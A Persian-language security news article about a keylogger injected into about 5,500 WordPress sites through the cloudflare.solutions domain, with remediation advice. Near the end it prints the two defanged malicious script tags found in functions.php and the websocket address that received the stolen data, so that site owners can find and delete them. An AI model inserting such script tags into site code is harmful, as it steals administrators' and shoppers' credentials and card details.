یکی از سیستمهای مدیریت محتوای معروف و کاربردی، سیستم مدیریت محتوای ورد پرس است که البته کاملاً رایگان و اپن سورس (Open Source) است. ورد پرس توسط زبان محبوب PHP نوشته شده و از قدرت MySQL بهره میبرد.
یکی از سیستمهای مدیریت محتوای معروف و کاربردی، سیستم مدیریت محتوای ورد پرس است که البته کاملاً رایگان و اپن سورس (Open Source) است. ورد پرس توسط زبان محبوب PHP نوشته شده و از قدرت MySQL بهره میبرد.
اما اخیراً مسئله نگرانکنندهای پیش آمده است. در حال حاضر حدود 5500 سایت اینترنتی که از سیستم مدیریت محتوای ورد پرس استفاده میکنند به یک کد اسکریپت (Script) مخرب آلوده شدهاند که با دامنه cloudflare.solutions کار میکند اما این اسکریپت (Script) هیچ ارتباطی با CDN معروف CloudFlare ندارد. بنا به گزارشی بیشتر وبسایتهای آلوده شده از طریق این اسکریپت در الکسا رنکی بالای 200000 دارند و دادههای دزدیده شده از این وبسایتها بهواسطه این اسکریپت مخرب، به آدرس /wss://cloudflare[.]solutions:8085 فرستاده میشوند.
این اسکریپت (Script) مخرب از keyLogger بهره میبرد. keyLogger در دو نوع نرمافزاری و سختافزاری وجود دارد. در این مورد قطعه کدی نرمافزاری است که کلیدهای فشردهشده توسط کاربر را ذخیره میکند و برای هکر ارسال میکند.
متأسفانه این اسکریپت مخرب در هر دو بخش فرانتاند (Frontend) و بکاند (Backend) سایتهای قربانی اجرا میشود بنابراین بهراحتی میتواند نام کاربری و رمز عبور مدیر وبسایت را هنگام ورود به پنل مدیریت به دست آورده و به این پنل دسترسی داشته باشد.
این اسکریپت درصورتیکه بتواند در فرانتاند (frontend) سایت قربانی اجرا شود هم بسیار خطرناک است. در این حالت اسکریپت مخرب بهراحتی میتواند اطلاعاتی که کاربران در فیلدهای comment وارد میکنند را ذخیره کرده و اطلاعات آنها را به سرقت ببرد.
این اسکریپت درصورتیکه روی یک وبسایت فروشگاه آنلاین بارگذاری شود و این چنین وبسایتی را آلوده کند میتواند اطلاعات حساس کاربران همچون اطلاعات کارت بانکی و رمز عبور آنها را به دست بیاورد.
نکته کلیدی در مورد این اسکریپت مخرب قرار گرفتن در فایل اصلی function.php است، فایل استانداردی که در تمام تمهای ورد پرس موجود است. وجود کد مخرب در این فایل باعث میشود که کد مخرب بهراحتی بتواند روی انواع مرورگرهای قربانیان اجرا شود.
جالب اینجاست که این نمونه اسکریپت از دقیقاً همین دامنه اصلاً تازگی ندارد و این سومین باری است که دامنه cloudflare.solutions اسکریپتی مخرب وبسایتها را آلوده میکند. حمله اول مربوط به ماه آوریل است که طی این حمله هکرها توانستند به سایتهای تبلیغاتی نفوذ کرده و اسکریپت خود را پشت بنرهای تبلیغاتی قرار دهند.
حمله دوم در ماه نوامبر اتفاق افتاد. هکرها در این حمله کد اسکریپتی شبیه به ساختار گوگل آنالیتیکز (Google Analytics) نوشته بودند. این کد و حمله که Coinhive نام داشت از منابع سختافزاری سیستم قربانیان برای به دست آوردن بیت کوین استفاده میکرد. این کد مخرب توانست بیشتر از 1833 سایت را آلوده کند.
راهحل مقابله با اسکریپت مخرب در ورد پرس
همانطور که گفته شد اسکریپت مخرب در فایل function.php قرار گرفته است و این کد بهصورت زیر است:
< script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/reconnecting-websocket/1.0.0/reconnecting-websocket.js' >< /script > < script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/cors/cors.js' >< /script >
به گفته محققان امنیت سایبری کمپانی Sucuri، وبسایتهای آلوده شده به این اسکریپت بهراحتی میتوانند با جستجوی اسکریپتهای فوق در فایل function.php در WordPress theme و حذف آن، از سرقت اطلاعات مهم مدیر وبسایت و کاربران جلوگیری کنند.
اگر تجربهای در این خصوص داشتهاید با ما به اشتراک بگذارید.
برای اینکه از تمامی اخبار در اولین فرصت مطلع شوید با کانال تلگرام ما با آی دی faceitmag@ همراه باشید.
منبع خبر: bleepingcomputer
ثبت نظر